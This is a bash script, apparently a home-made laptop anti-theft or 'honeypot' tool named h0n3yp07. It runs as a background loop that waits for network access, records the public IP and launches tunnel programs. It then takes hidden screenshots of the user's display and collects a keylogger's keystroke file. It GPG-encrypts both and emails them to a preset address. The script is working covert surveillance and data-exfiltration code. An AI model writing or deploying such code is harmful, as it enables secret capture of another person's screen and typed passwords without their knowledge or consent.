#!/bin/bash

TMPDIR="/tmp"
TICK="5"
STATUS=""
TUNS=$(ls /usr/local/bin | grep tun_)
PHOTO_PACKAGE_ROOT="/tmp/yaourt-tmp-root/scrot/package/"

NAME="$(cat /usr/local/etc/tarspoon/receiver.name)"
MAIL="$(cat /usr/local/etc/tarspoon/receiver.mail)"
L_USER="$(cat /usr/local/etc/tarspoon/user.local)"

function cheese {
	sleep $(($1*$1*112))
	su $L_USER -c "bash -c \"export DISPLAY=:0.0 && import -window root ${PHOTO_PACKAGE_ROOT}/${RANDOM}.jpg\""
}

function send_darth_maul_to_take_some_photos {
	echo "$(date)> maul: hide your kids, hide your wives" >> /var/log/tarspoon/tarspoon.log

	cd ${PHOTO_PACKAGE_ROOT}/..
	rm maul.tgz
	[ "$(ls -A ./package)" ] && \
		echo "$(date)> maul: packing photos" >> /var/log/tarspoon/tarspoon.log && \
		tar -czf maul.tgz package/ && \
		rm package/* || \
		echo "$(date)> maul: nothing to pack" >> /var/log/tarspoon/tarspoon.log && \
	cd -	

	for tt in {0..4} ; do
		cheese $tt &
	done

}

function call_home {
	echo "$(date)> call: returning the favor" >> /var/log/tarspoon/tarspoon.log

	rm /root/*gpg 
	if [[ -f ${PHOTO_PACKAGE_ROOT}/../maul.tgz ]]; then
		echo "$(date)> call: found juicy screenshots" >> /var/log/tarspoon/tarspoon.log
		gpg -eo /root/maul.gpg -r "$NAME" ${PHOTO_PACKAGE_ROOT}/../maul.tgz
		echo "sent from h0n3yp07 v0.1.0" |mutt -a /root/maul.gpg -s "${STATUS} M4UL $(date)" -b "$MAIL"
	fi

	if [[ -f /var/log/logkeys.log ]]; then
		echo "$(date)> call: found some keypresses" >> /var/log/tarspoon/tarspoon.log
		gpg -eo /root/keys.gpg -r "$NAME" /var/log/logkeys.log
		echo "sent from h0n3yp07 v0.1.0" |mutt -a /root/keys.gpg -s "${STATUS} K3YZ $(date)" -b "$MAIL"
	fi
}

function rocket {
	echo "$(date)> rocket: checking for network" >> /var/log/tarspoon/tarspoon.log

	# Stage one: waiting for the network to go up
	STATUS=$(curl icanhazip.com 2>/dev/null)
	TICK=$((5+$TICK))
	[[ -z $STATUS ]] && return
	
	# We're here iff we're on the network
	TICK="1800"

	[[ ! -z $TUNS ]] && for x in $TUNS; do /usr/local/bin/$x & done
	$TUNS=""

	echo "$(date)> rocket: all systems green" >> /var/log/tarspoon/tarspoon.log

	send_darth_maul_to_take_some_photos

	call_home
}

# Prepare environment here
mkdir -p $PHOTO_PACKAGE_ROOT
chown -R $L_USER $PHOTO_PACKAGE_ROOT
chgrp -R users $PHOTO_PACKAGE_ROOT
chmod -R go+rw $PHOTO_PACKAGE_ROOT

echo "$(date)> booted up $(cat /etc/hostname)" >> /var/log/tarspoon/tarspoon.log
while true; do
	rocket
	sleep $TICK
done
